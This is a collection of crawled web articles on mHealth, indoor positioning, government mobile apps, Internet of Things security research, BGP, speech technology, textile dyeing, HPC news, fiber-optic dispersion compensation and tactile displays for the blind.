s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00422-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896541
481
2.625
3
Have a question for us? Use our contact sales form: There's an interesting report here from the UN Foundation and Vodafone, talking about mHealth, that is applications of mobile technology to health problems in the developing world. Because mobile has grown so fast, and costs have fallen rapidly, the mobile phone has leap-frogged the land-line and the personal computer and rapidly become the most pervasive communications device in places like Africa and Latin America. Land-lines will never catch up now (because the infrastructure cost is too high), and in terms of personal computing, the phone is the first computer many Africans will see, and in many cases the only Internet-connected device. The UN report shows that there are approximately 10 times as many mobiles available as computers, so the potential effect is profound. But mHealth is not necessarily about the Internet at all, and in fact many of the successful applications are delivering value through basic voice and text functions. One example is disease tracking, where field workers can report malaria outbreaks, or cholera spread using IVR or text-based applications. This allows quicker central understanding of what's happening in the population, and allows a meaningful medical response. Another example is in communication of health information. Where there are few health workers addressing the needs of a large and distributed population, it is not possible to reach everyone in person to communicate information about staying healthy. SMS texting is a useful channel for sending information out widely, without depending on people visiting clinics. The report also talks about remote monitoring, where TB patients are given mobiles so that remote health workers can monitor their condition, and also remind the patients to take their drugs. The evidence shows that compliance of patients is greatly increased, meaning more chance that they will make a recovery, but also (importantly) pass on the disease to fewer others. A lot of the tools that we have available through phones (IVRs, USSD menus, text, voice SMS etc) look primitive compared to the kind of communication available to Internet users in the richer North of the planet, but it's easy to overlook the radical effect that simple technologies can have on the poorer communities of the World.
<urn:uuid:17f225b8-86e7-4a24-bc30-bfa5cfd6026a>
CC-MAIN-2017-04
http://www.dialogic.com/den/developers/b/developers-blog/archive/2009/06/05/the-growth-of-mhealth.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00057-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949363
442
2.890625
3
The Global Positioning System was developed 40 years ago this year, and it was put into full operation 20 years ago next year. Since then, many devices have incorporated GPS capabilities -- first it was dedicated electronic devices, but now just about anyone with a mobile device can use it to easily get from Point A to Point B. But what if you are already at Point B and you want to find your way around once you go inside? “Indoor GPS” is a bit of a misnomer, since it doesn’t use GPS satellites to get a position but uses other methods such as Wi-Fi signals and sensors already present in many buildings. For the past year, this feature has been almost exclusively used by Google in its Maps for Android. But Google is limited by the number of building floor plans available – so far, it has managed to accumulate 10,000 floor plans spanning 13 countries. Not a lot. But the prospects for indoor positioning could be looking up as the field of providers expands. Apple recently acquired a company called WiFiSLAM in order to provide indoor mapping. And last August, a group of companies, including Nokia, Samsung, Sony Mobile and 19 others, formed the In-Location alliance to further develop the technology. Earlier last year, Broadcom began shipping a microchip designed to tie together a variety of positioning feeds for indoor tracking, including of vertical positions. Soon, everyone with a mobile device could be able to navigate any publically accessible building. High-security government buildings are likely to be the exception, of course. But with secure mobile device management becoming more powerful and easier to implement, perhaps a secure version of indoor GPS will allow authorized personnel to make their meetings on time while still keeping people that don’t belong in the dark. Posted by Greg Crowe on Apr 01, 2013 at 9:39 AM0 comments The best defense against severe weather is early warning, giving people time take shelter and prepare. And as people increasingly rely on mobile devices for communications, especially in weather emergencies when power goes out, a mobile app can be a critical communication tool. The Red Cross's Tornado App is the latest tool to keep people apprised of severe weather warnings. It even has an attention-getting audible siren that goes off when a tornado warning is issued to reduce the chance of sleeping through an actual warning. Based on data from the National Oceanic and Atmospheric Administration, the app provides warnings, updates and instructions on how to prepare an emergency kit and what to do even when cellular towers and TVs are down. It can help users contact friends and family (and includes an “I’m Safe” notification), and will also notify users when a warning has passed. It even has a gaming aspect, letting people earn badges for learning how to prepare for a tornado. In 2012, tornadoes in the United States claimed 70 lives and did an estimated $1.6 billion in damage, according to the National Weather Service. And as tornado seasons go, 2012 was a relatively quiet year, according to NOAA. The free app is available from iTunes or Google Play. Users can also call "**REDCROSS" (**73327677) for a link to the app. Posted by Greg Crowe on Mar 28, 2013 at 9:39 AM0 comments Despite government mandates and corporate policies, many employees still smoke cigarettes. This epidemic can be looked at to cost both employees and the agencies they work for countless dollars in medical insurance and maintenance costs, not to mention the payout for the actual cigarettes, which quite frankly is getting expensive. The 2010 Surgeon General’s report said that “low levels of smoke exposure, including exposures to secondhand tobacco smoke, lead to a rapid and sharp increase in dysfunction and inflammation of the lining of the blood vessels, which are implicated in heart attacks and stroke.” So the smokers are not the only ones at risk. Many smokers want to quit, but they don’t know where to start. The National Cancer Institute wants to help. NCI has released a free smart-phone app called NCI QuitPal that will help someone become smoke-free. With it you can set a quit date, financial goals and reminders to help you stay on track. It will track money saved on not buying cigarettes, keep track of packs not smoked, supply tips to help deal with cravings and give you milestones pertaining to your estimated state of health based upon how long you’ve been smoke-free. It even has a hotline to NCI’s Cancer Information Service if you have any questions. NCI QuitPal does pretty much everything for you except the most important thing – actually quitting smoking. Only you can do that. But this app will make it easier to keep track of your progress, which might be all the incentive a smoker looking to quit needs. Posted by Greg Crowe on Mar 26, 2013 at 9:39 AM0 comments
<urn:uuid:c94ece8c-b658-406e-b5cf-19d5b6053950>
CC-MAIN-2017-04
https://gcn.com/Blogs/Mobile/List/Blog-List.aspx?m=1&Page=11
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00543-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955414
1,019
2.609375
3
Definition: A finite number of strings that are searched for in texts. See also pattern element, string matching. Note: From Algorithms and Theory of Computation Handbook, page 11-26, Copyright © 1999 by CRC Press LLC. Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 17 December 2004. HTML page formatted Mon Feb 2 13:10:40 2015. Cite this as: Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "pattern", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/pattern.html
<urn:uuid:7423eeb0-1bd2-40f4-a7c0-230be4408f9f>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/pattern.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00295-ip-10-171-10-70.ec2.internal.warc.gz
en
0.784023
193
2.765625
3
Internet Of Things Security Reaches Tipping PointPublic safety issues bubble to the top in security flaw revelations. It all began more than four years ago with HD Moore's groundbreaking research in embedded device security -- VoIP, DSL, SCADA, printers, videoconferencing, and switching equipment -- found exposed on the public Internet and sporting diagnostics backdoors put in place by developers. The holes could allow an attacker access to read and write memory and power-cycle the device in order to steal data, sabotage the firmware, and take control of the device, Moore, chief security officer at Rapid7 and creator of Metasploit, found. "This feature shouldn't be enabled" in production mode but instead deactivated, he told Dark Reading in a 2010 interview on his research on the widespread vulnerability in VxWorks-based devices. Fast forward to Black Hat USA and DEF CON 22 last week in Las Vegas, where the dominant and overarching theme was the discovery of, yes, intentional backdoors, hardcoded credentials, unencrypted traffic, and critical systems lumped on the same network as noncritical functions, in today's increasingly networked and automated commercial systems. And those embedded hardware weaknesses were on display by researchers who found them in cars, TSA checkpoint systems, satellite ground terminals, cell phones and networks, home automation and security systems -- and even baby monitors. Moore's 2010 findings and subsequent research should have been a major wakeup call for the Internet of Things. But instead the problem has now snowballed and gone mainstream as industries not schooled in cyber security got their first lesson in white-hat hacking in the past year as massive holes in their consumer products have been discovered and publicized. Now that these vulnerabilities, many of which require relatively simple fixes, have spilled into the arena of public and physical safety with hackable cars, pacemakers, road traffic systems, and airplanes, the tipping point for solving the security of Internet-connected things may finally have arrived. It's the public safety angle that may ultimately capture the attention of legislators and regulators -- if not the consumer product vendors themselves -- to start taking security seriously, experts say. "Everybody should be worried a lot. It's modified Linux in most cases [in these devices]" and there has been little if any improvement in its security, says Marc Maiffret, CTO at BeyondTrust. "A lot have lame vulnerabilities. Name your embedded system -- it's going to have something." Just how to get the consumer product world in sync with security research is the problem. Researchers routinely report bugs to the vendors and government-based organizations like the ICS-CERT, but they still either get ignored altogether by the vendors or in some cases face legal threats. "There's no framework for the level of accountability, no responsibility to accept [by the vendors]. The risk is passed on to the consumer," says Trey Ford, global security strategist at Rapid7. But there was a shift last week in Vegas, as the security community began pitching and proposing some next steps to fix the problem of vulnerable consumer goods. I Am The Cavalry, a grassroots organization formed to bridge the gap between researchers and the consumer products sector, last week at DEF CON published an open letter to CEOs at major automakers, calling for them to adopt a new five-star cyber safety program. The group also provided a petition via change.org for others to sign. The voluntary program includes secure software development programs, vulnerability disclosure policies, forensics information, software updates, and the segmentation and isolation of critical systems on the car's network. Joshua Corman, chief technology officer at Sonatype and co-founder of I AmThe Cavalry, says with lives at risk with many of these consumer products, such as cars, the time has come for a framework and action. Attacks against cars and other critical consumer things are a matter of public safety, he says. "You want to measure twice and cut once," he says of the need for baking security into such consumer products. [Yes, the ever-expanding attack surface of the Internet of Things is overwhelming. But next-gen security leaders gathered at Black Hat are up to the challenge. Read The Hyperconnected World Has Arrived.] Another group of security researchers is helping out smaller embedded device vendors with initial pro bono security testing of pre-production code for their IP cameras and other consumer devices. "We're going to have researchers looking at their pre-production hardware before getting it in [consumers'] hands," Mark Stanislav, a researcher with DuoSecurity, which is one of the founders of the group, said in an IoT session at DEF CON. So far, Belkin, DropCam, DipJar, and Zendo are among the IoT firms that have taken BuildItSecure.ly up on its offer. The hope is some of these smaller firms may ultimately offer bug bounties to researchers who find vulnerabilities, or will end up engaging with the firms in consulting gigs, for example. BeyondTrust's Maiffret, meanwhile, says consumer product vendors should at least open up their Linux code to open source so it can be patched and updated. "There are a lot of ARM processors running Linux and they have some software apps sitting on top... a NAS or IP camera," for instance, he says. "At least open it up so Linux can manage, patch and update it." That same theme was echoed by Dan Geer in his keynote address at Black Hat last week. Geer proposed that software that's no longer updated or supported by its vendors should be transferred to the open-source community. He also suggested that embedded devices have a finite life span. "Embedded systems, if having no remote management interface and thus out of reach, are a life form, and as the purpose of life is to end, an embedded system without a remote management interface must be so designed as to be certain to die no later than some fixed time," Geer told attendees. "Conversely, an embedded system with a remote management interface must be sufficiently self-protecting that it is capable of refusing a command." The bottom line is there's a lack of consumer product vendors taking ownership of the security of these products, Maiffret says. "We're always going to have a constant state of vulnerabilities," he says. Billy Rios at Black Hat USA discusses TSA checkpoint systems he found exposed on the public Internet. Photo Credit: Sarah Sawyer The good news is that much of the research in the more critical consumer device security -- cars, traffic control systems, for instance -- is ahead of the attackers, as far as we know, experts say. "Some of the hardware is very difficult to get," such as traffic control sensors, says Cesar Cerrudo, who last week at DEF CON provided new details on vulnerabilities he found in vehicle traffic control systems. "You can't go to the store. That's good for bad guys [in] that it's not easy. But at some point they can steal them or get them in some way." Cerrudo set up a phony company in order to buy traffic sensors from Sensys Networks for his research, he says. But even a more easily accessible smart TV or egg counter, if compromised, can wreak havoc on consumers. "Whatever is connected to the Internet or a network is a possible target," Cerrudo says. "We can put a man on the moon, but we can't make software reliable?" says Rick Howard, CSO at Palo Alto Networks. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio
<urn:uuid:0a6e7745-ea16-4f79-976e-a57d9f2ccdd5>
CC-MAIN-2017-04
http://www.darkreading.com/vulnerabilities---threats/internet-of-things-security-reaches-tipping-point/d/d-id/1298019?_mc=RSS_DR_EDT
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955609
1,592
2.515625
3
BGP is the Internet routing protocol. He is making the Internet work. BGP protocol performs actions by maintaining IP networks table for the biggest network in the world – The Internet. The BGP protocol, as a code of behavior, supported core routing decisions over the Internet. Instead of using traditional IGP (Interior Gateway Protocol) metrics, BGP protocol relies upon available path, network guidelines and rule-sets for routing decision making purposes. And just for this feature, it is sometimes expressed as a reachability protocol. The main idea behind the BGP creation was to replace the EGP (Exterior Gateway Protocol) to permit a complete decentralized routing. NSFNET backbone is the best example of a decentralized system.
<urn:uuid:66553ec4-df0e-4417-bfa5-f514ca8472d5>
CC-MAIN-2017-04
https://howdoesinternetwork.com/tag/routing-protocol
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00323-ip-10-171-10-70.ec2.internal.warc.gz
en
0.874316
146
3.640625
4
Implementing natural language speech systems doesn't mean building computers that can converse with humans. The goal should be to build simple but useful applications. For years people who have struggled to work with mindless interactive voice response (IVR) systems have wondered when computers might become smart enough to react like conversational human beings. The answer is not very soon and possibly never unless computer scientists can invent a machine with something resembling conscious intelligence. But that still leaves plenty of room for improvement for the IVR systems we have to work with from time to time. It can get a lot more sophisticated than simply pushing telephone buttons in response to voice commands and questions. Speech system developers, led by IBM, are conducting research into increasing the natural language and near-conversational capabilities of this technology. But people essentially have to stop thinking about speech technology in terms of Star Trek androids, suggested a panel of industry experts who discussed the present state of the art in natural language speech technology at the AVIOS SpeechTEK 2004 in San Francisco this week. You dont need humanoid machine intelligence to build an IVR system that can help you make a travel reservation, check your stocks, manage your financial accounts, retrieve email or any of a thousand other basic tasks, the panel agreed. Enterprises are already implementing speech systems for a wide range of purposes. The belief that using speech systems "should be exactly like working with a human being is an interesting research goal," said panelist Deborah Dahl, principal of the consulting firm Conversational Technologies, based in Norristown, Pa. "But in the meantime we need to look at how to make our systems more natural and more usable," she said. Speech system developers are going to do this by developing more sophisticated user interface design conventions that are also practical and effective, she said. "They arent totally like working with a human being," she said, but "theyre things that people can learn easily, and theyll adapt to this in the same way that we adapt to the conventions of a Windows user interface." One of the key problems in getting machines to understand natural language, the panelists agreed, is their ability to recognize the highly varied intonations of human speech and the rhythmic prosody that give humans instant understanding of speech. While the basic technology is there for machines to react to prosodic statements, Dahl said, its still not enough for machines to react with anything resembling conversational speech. One particularly difficult problem to solve is the human tendency to use the "mixed initiative," such as when we speak a single word as if it were a question. For example, suggested panel moderator Moshe Yudkowsky, head of Chicago-based speech technology consulting firm Disaggregate, if an IVR system asked "Do you want to fly Tuesday?," a human might respond by indignantly barking "Tuesday?" The IVR system could either recognize that as an affirmative response or as an inappropriate response; both reactions are likely to arouse frustration in the human.
<urn:uuid:2c289831-76a0-4fd2-825d-696942aebf56>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Enterprise-Applications/Speech-Technology-Keep-it-Simple-Stupid
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00533-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961949
621
2.609375
3
For decades now, the international apparel and textile industry has faced a problem that may seem too big to solve: how to reduce or eliminate water pollution that's a direct result of the production process — especially the resource-intensive dyeing process. The statistics are as familiar as they are disheartening: according to the World Health Organization, 1.1 billion people don't have access to potable water, which is the biggest single cause of illness and disease. The cotton industry produces 30 million tons of the fiber each year, and roughly 13 gallons of water are needed to dye just one pound of cotton. Indeed, of all fibers, cotton requires the most water for the dyeing process. And half of all garments produced annually are made from cotton. Despite all of the technological advances in manufacturing apparel, the cotton dyeing process hasn't changed significantly since the Industrial Revolution. Most alarming, however: pollution from textile dyeing dumps 72 toxic chemicals into waterways — 30 of which cannot be removed once they've entered the water. The continuing saga in Indian textile production city Tirupur, where manufacturing facilities have come to a standstill after the Noyyal River has become clogged with pollution, is perhaps the most glaring example of the severity of the industry problem. "We live in a hydrosphere where all water resources are connected," says Alexandra Cousteau, water conservationist and granddaughter of Jacques Cousteau, speaking in New York on August 7. The textile dyeing industry is responsible for 20 percent of worldwide industrial water pollution, the World Bank reports. Cousteau developed her love of oceans when she was 11 years old and exploring their vast expanses with her famous explorer grandfather, the "steward king" of aquatic environments. "When you lose those places, you lose more than a creek or a stream — you lose the opportunity to pass them on to the next generation," she explains. A different way of doing things A new startup is hoping to disrupt the status quo and clean up the textile industry's black eye. Backed by 15 years and millions of dollars of research in a North Carolina laboratory, ColorZen pretreats cotton fibers to create a natural affinity between the fiber and dye, thereby eliminating the chemical additives currently required to force the dye to adhere. "We change the fiber on a molecular level, the part that's responsible for attracting or repelling the dye," says ColorZen co-founder Michael Hariri. The process uses 90 percent less water and 75 percent less energy than the standard cotton dyeing procedures, he adds, while achieving the same rich hues and colorfastness. ColorZen launched informally at the Continuum Show this year, following with a formal press event on August 7. Manufacturers interested in the ColorZen solution avoid additional capital expenditures; the company maintains a dyeing facility and global headquarters in China where apparel producers send their raw cotton fiber for pretreatment and dyeing. The additional time required to ship the fiber to and from the ColorZen facility is balanced out by the reduced dyeing time; the company's dye process takes just one-third of the time of the traditional process, says Hariri. Technical director Tony Leonard claims that with ColorZen's process, 97 percent of the dye chemicals bond to the fabric, creating a significantly cleaner dyebath at the end of the process. Because ColorZen doesn't rely on freshwater resources for its process, future dyeing facilities can be located virtually anywhere — even in arid regions — and could end up strategically placed near the next link in the global supply chain, says Hariri. As of now, the process works only with cotton and select other natural fibers; the company is looking into expanding the use case for cotton-synthetic blends. ColorZen initially aims to partner with high-end brands that have the high margins capable of absorbing the modest but additional cost of its alternative dye process. Hariri insists consumers will largely avoid paying a premium for ColorZen products — which will feature specially branded hang tags in stores — explaining that additional costs are mostly recovered during production. "We're going after certain kinds of brands first, those that have already embraced sustainability," he says. "All brands today want to be sustainable," Hariri adds. "Consumers are demanding it." Jessica Binns is a Washington, D.C.-based freelance writer specializing in business, technology and social media.
<urn:uuid:db404be2-3243-4b9e-9de4-b10ce73f2c57>
CC-MAIN-2017-04
http://apparel.edgl.com/magazine/November-2012/To-Solve-a-Global-Water-Pollution-Problem,-ColorZen-Starts-at-the-Molecular-Level81726
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00103-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954613
896
3.25
3
Here is a collection of highlights from this week’s news stream as reported by HPCwire. Johns Hopkins Builds Data Mining Super Machine While most supercomputing designs nowadays are focused on achieving a maximum number of FLOPS (floating point operations per second), researchers at Johns Hopkins University are designing a scientific instrument that will enable a maximum number of IOPS (I/O operations per second). This novel architecture will be better suited to analyzing the enormous amounts of data that today’s science generates. Dubbed the Data-Scope, the machine is currently being developed by a group led by computer scientist and astrophysicist Alexander Szalay of Johns Hopkins’ Institute for Data Intensive Engineering and Science. The National Science Foundation is providing funding in the form of a $2.1 million grant and Johns Hopkins is contributing nearly $1 million to the project. According to Szalay: “Computer science has drastically changed the way we do science and the science that we do, and the Data-Scope is a crucial step in this process. At this moment, the huge data sets are here, but we lack an integrated software and hardware infrastructure to analyze them. Data-Scope will bridge that gap.” Data-Scope’s design will include a combination of hard disk drives, solid state disks, and GPU computing, enabling it to handle five petabytes of data, with a sequential I/O bandwidth close to 500 gigabytes per second, and a peak performance of 600 teraflops. The machine will be adept at data mining, able to discern relationships and patterns in data leading to discoveries that would otherwise not be possible. There is already a backlog of data just waiting to be analyzed — three petabytes worth from about 20 interested research groups within Johns Hopkins. Szalay explains that without Data-Scope, the researchers would have to wait years in order to analyze the data already in existence, never mind the data that will keep accumulating in the meantime. Data-Scope is expected to being operation in May 2011 and will handle a range of subject matter, including genomics, ocean circulation, turbulence, astrophysics, environmental science, and public health. Szalay underscores the importance of the project: “There really is nothing like this at any university right now. Such systems usually take many years to build up, but we are doing it much more quickly. It’s similar to what Google is doing — of course on a thousand-times-larger scale than we are. This instrument will be the best in the academic world, bar none.” Appro Outfits LLNL with Visualization Cluster This week Appro launched its Appro HyperPower Clusters, providing Lawrence Livermore National Laboratory (LLNL) Computing Center with a new visualization cluster called “Edge.” The cluster is based on the Appro CPU/GPU GreenBlade System and is designed to support I/O bound applications, such as advanced data analysis and visualization tasks. It will also be used for LLNL’s exascale software development computing projects. The system’s six racks house a total of 216 CPU nodes sporting Six-Core Intel Xeon processors and 208 NVIDIA Tesla GPUs nodes, delivering 29 teraflops of computing power. The system’s 20 terabytes of memory provide the increased level of I/O bandwidth needed for data analysis and complex visualization projects. QDR InfiniBand fabric connects the compute and graphic nodes. According to Trent D’Hooge, a cluster integration lead at LLNL, Edge is the first data analysis cluster that has GPUs with ECC support and increased double-precision floating point performance. Becky Springmeyer, computational systems and software environment lead of the Advanced Simulation and Computing program at LLNL, explains that ”post-processing tasks are heavily I/O bound, so specialized visualization servers that optimize I/O rather than CPU speed are better suited for this work, which will be now enabled through the ‘Edge’ cluster.”
<urn:uuid:c1d463bb-fbef-4364-af9e-03b46cb25c91>
CC-MAIN-2017-04
https://www.hpcwire.com/2010/11/04/the_week_in_review/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00011-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907865
833
2.828125
3
Mobile phones, iPods, and Xboxes will become part of the teaching tool-kit, according to a survey of education professionals from industry body Intellect. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. More than 50% said pupils' personal devices will be incorporated into lessons over the next five years and used as much in school as at home. However, 60% said their schools had nowhere near enough technology, or could benefit from additional technology, while more than half said they needed more training in the use of technology. Consoles like the XBox and Playstation are increasingly becoming digital media hubs at home, and are far more powerful than modern desktop PCs. Phil Hemmings, chair of the Intellect Education Group, said, "Education professionals view ICT as a key teaching tool and an important way of communicating with pupils and parents. However, there is still much work to be done. Many professionals would like more training and the results of our sample indicate that further investment in technology is still required." Roger Broadie, a member of the technology in education body, added that there is currently a divide between schools that are helping pupils to learn effectively with ICT and those beginning to lag behind. Of the 277 schools polled, more than 80% said they considered technology as either "essential" or "useful" for engaging with pupils.
<urn:uuid:5cf8cd75-dfbf-4049-a85e-9e0645b4ca34>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280094805/Cash-strapped-schools-will-use-pupils-mobile-phones-and-Xboxes
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00065-ip-10-171-10-70.ec2.internal.warc.gz
en
0.977767
293
2.734375
3
With the exponential growth in communications, caused mainly by the wide acceptance of the Internet, people’s demands of bandwidth and large data capacity have increasingly grown. However, from a technical perspective, fiber attenuation, dispersion and nonlinearity can significantly limite the bit rate and the spanning distance of the optical communication. With the improvement of fiber manufacturing and the invention of EDFA (erbium-doped fiber amplifier), the war against attenuation has been won, while dispersion and nonlinearity are still taken into main consideration in today’s high speed optical communication systems. Today, we are maily explaining the dispersion in fiber optics and the dispersion compensation, as well as introducing the Fiberstore‘s dispersion compensation module solution in this paper. Dispersion in Optical Fibers The broadening of light pulses, called dispersion, is a critical factor limiting the quality of signal transmission over optical links. Dispersion is a consequence of the physical properties of the transmission medium. In general, there are three main types of dispersion in a fiber: Modal Dispersion – Modal dispersion occurs only in Multimode fibers. In a multimode fiber with a step profile of the refraction index all rays travel with the same speed – the rays traveling along the fiber axis have the same speed as the rays traveling close to the core-cladding interface. As they cover the optical paths of different length at the same speed they reach the detector at different times. This leads to the temporal pulse broadening at the end of the fiber. This type of temporal broadening is called the modal dispersion. Polarization mode dispersion (PMD) is a form of modal dispersion where two different polarizations of light in a waveguide, which normally travel at the same speed, travel at different speeds due to random imperfections and asymmetries, causing random spreading of optical pulses. Waveguide Dispersion – Waveguide dispersion is chromatic dispersion which arises from waveguide effects: the dispersive phase shifts for a wave in a waveguide differ from those which the wave would experience in a homogeneous medium. Waveguide dispersion is important in waveguides with small effective mode areas. But for fibers with large mode areas, waveguide dispersion is normally negligible, and material dispersion is dominant. Material Dispersion – Material dispersion is the phenomena whereby materials cause a “bundle” of light to spread out as it propagates. It is also a kind of chromatic dispersion. Material dispersion is not helpful in optical communications that it limits how much data can be sent, as the pulses will overlap and information will be lost. Waveguide dispersion and material dispersion both belong to chromatic dispersion. In fiber optical high bit rate (such as 10G or 40G bit/s) long-haul transmission systems, dispersion compensation is one of the most important items to be considered for design. Management or optimization of residual dispersion are required for photonic networks, i.e., for fibers, repeaters and optical interfaces.In addition, PMD compensation is also required especially for 40Gbit/s or higher bit rate long-haul systems. In a word, dispersion compensation is an important issue for fiber-optic links. Nowadays, there are many solution of dispersion compensation in fiber optics, such as dispersion compensation module (DCM), disperison compensation fiber (DCF), typical bragg grating operation and chirped fiber bragg grating etc. In optical fiber communications, dispersion compensation modules (DCM) can be used for compensating the chromatic dispersion of a long span of transmission fiber. Typically, such a module provides a fixed amount of dispersion (e.g. normal dispersion in the 1.6-μm spectral region), although tunable dispersion modules are also available. A module can easily be inserted into a fiber-optic link because it has fiber connectors for the input and output. The insertion losses may be compensated with a fiber amplifier, e.g. an EDFA in a 1.5-μm telecom system. A dispersion compensation module is often placed between two fiber amplifiers. Fiberstore Dispersion Compensation Module Solution The Dispersion Compensation Modules (DCMs) are building blocks of the Fiberstore CWDM&DWDM Optical Transport System and serve at optical communication nodes to provide negative chromatic dispersion known as pulse spread phenomenon that limits the high-bit rateand maximal transmission distance of data along optical fibers. The FS-DCM series modules, based on mature and reliable Disperison Compensation Fiber(DCF) technoloty, are desinged for 19-inch Rack Mount configuration which is used to compensate chromatic dispersion at any rates including 10Gbps, 40Gbps and even 100Gbps data rates in ultra long haul coherent networks, such as SDH high-bit transmission system, DWDM networks, CATV long haul transmission systems. These modules can achieve -10 to -2100 ps/nm of dispersion values at 1550nm wavelength and supply broad band dispersion slop compensation for standard singlemode fiber(SMF28 – G.652 fiber) across entire C-Band while maintaining an extremely low and flat insertion loss as well as low latency. The FS-DCM series is a single-slot module that typically connects to the mid-stage of a Fiberstore Optical Amplifier, eg. EDFA, in long hual transmission system. The optical budget is not affected if the FS-DCM series is connected with an optical amplification with Mid-Stage. Futermore, compensation distance ranging from 10KM to 140 KM is available. |Part No.||Discription||Connector Options| |FS-DCM-10||19″ 1U FS-DCM-10 Dispersion Compensation Module 10KM||LC/UPC |FS-DCM-20||19″ 1U FS-DCM-20 Dispersion Compensation Module 20KM| |FS-DCM-30||19″ 1U FS-DCM-30 Dispersion Compensation Module 30KM| |FS-DCM-40||19″ 1U FS-DCM-40 Dispersion Compensation Module 40KM| |FS-DCM-50||19″ 1U FS-DCM-50 Dispersion Compensation Module 50KM| |FS-DCM-60||19″ 1U FS-DCM-60 Dispersion Compensation Module 60KM| |FS-DCM-70||19″ 1U FS-DCM-70 Dispersion Compensation Module 70KM| |FS-DCM-80||19″ 1U FS-DCM-80 Dispersion Compensation Module 80KM| |FS-DCM-90||19″ 1U FS-DCM-90 Dispersion Compensation Module 90KM| |FS-DCM-100||19″ 1U FS-DCM-100 Dispersion Compensation Module 100KM| |FS-DCM-110||19″ 1U FS-DCM-110 Dispersion Compensation Module 110KM| |FS-DCM-120||19″ 1U FS-DCM-120 Dispersion Compensation Module 120KM| |FS-DCM-140||19″ 1U FS-DCM-110 Dispersion Compensation Module 140KM| Typical Application Cases of FS-DCM Series
<urn:uuid:4bb47790-d63a-4224-8b5a-63215645cec0>
CC-MAIN-2017-04
http://www.fs.com/blog/fiberstore-dispersion-compensation-module-solution.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00185-ip-10-171-10-70.ec2.internal.warc.gz
en
0.851546
1,563
3.609375
4
Seeing is believing, unless you're blind or visually impaired. To this group, the National Institute of Standards and Technology (NIST) says, "try feeling is believing." Computer scientists and engineers in NIST's Information Technology Laboratory (ITL) have created two tactile graphic displays that bring electronic images to the blind and visually impaired in the same way that Braille makes words readable. The first graphic display technology, introduced as a prototype in 2002, conveys scanned illustrations, map outlines or other graphical images to the fingertips, and can translate images displayed on Internet Web pages or in electronic books. It uses refreshable tactile graphic display technology, allowing a person to feel a succession of images on a reusable surface. The machine uses about 3,600 small pins -- known as actuator points -- that can be raised in any pattern, and then locked into place to hold the pattern for reading. The actuator points then can be withdrawn and reset in a new pattern, allowing the tactile reading to continue through a variety of images. Each image is sent electronically to the device, which uses software to determine how to create a tactile display that matches the image. An array of about 100 small, very closely spaced (1/10 of a millimeter apart) actuator points set against a user's fingertip is the key to the second tactile graphic display technology. To "view" a computer graphic with this technology, a blind or visually impaired person moves the device-tipped finger across a surface like a computer mouse to scan an image in computer memory. The computer sends a signal to the display device and moves the actuators against the skin to "translate" the pattern, replicating the sensation of the finger moving over the pattern being displayed. With further development, this technology could possibly be used to make fingertip tactile graphics practical for virtual reality systems or give a detailed sense of touch to robotic control (teleoperation) and space suit gloves. The inspiration for both tactile graphic displays came from a "bed of nails" toy found in a novelty store. Watching the pins in the toy depress under fingers and then return to their original state started the ITL team thinking about how the principle could be applied to electronic signals. Image Courtesy of NIST.
<urn:uuid:69ec5d64-d741-4b42-bebd-f8ef6a5dc59d>
CC-MAIN-2017-04
http://www.govtech.com/health/Feeling-is-Believing-Tactile-Imaging-System.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00487-ip-10-171-10-70.ec2.internal.warc.gz
en
0.883956
459
3.671875
4
